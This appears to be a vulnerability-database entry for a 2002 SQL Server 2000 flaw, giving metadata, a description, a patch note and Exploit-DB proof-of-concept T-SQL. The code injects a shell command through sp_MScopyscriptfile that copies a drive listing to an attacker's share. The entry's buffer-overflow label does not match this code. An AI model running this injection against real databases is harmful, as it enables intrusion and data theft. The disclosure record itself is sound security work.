Microsoft SQL Server 2000 DBCC Buffer Overflow
Vendor: SQL Server
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 119
Product Name: SQL Server
Affected Version From: Microsoft SQL Server 2000
Affected Version To: Microsoft SQL Server 2000
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: o:microsoft:sql_server:2000
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

A vulnerability exists in Microsoft SQL Server 2000 due to a buffer overflow in the Database Consistency Checkers (DBCC) utilities. An attacker can exploit this vulnerability by sending a specially crafted request to the server, which could allow the attacker to execute arbitrary code with the privilege level of the SQL Server service account.

Mitigation:

Microsoft has released a patch to address this issue.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5307/info

Microsoft SQL Server 2000 includes utilities called Database Consistency Checkers (DBCC). Several of these programs contain identical buffer overflows that, when exploited, could allow an attacker to execute arbitrary code with the privilege level of the SQL Server service account.

declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''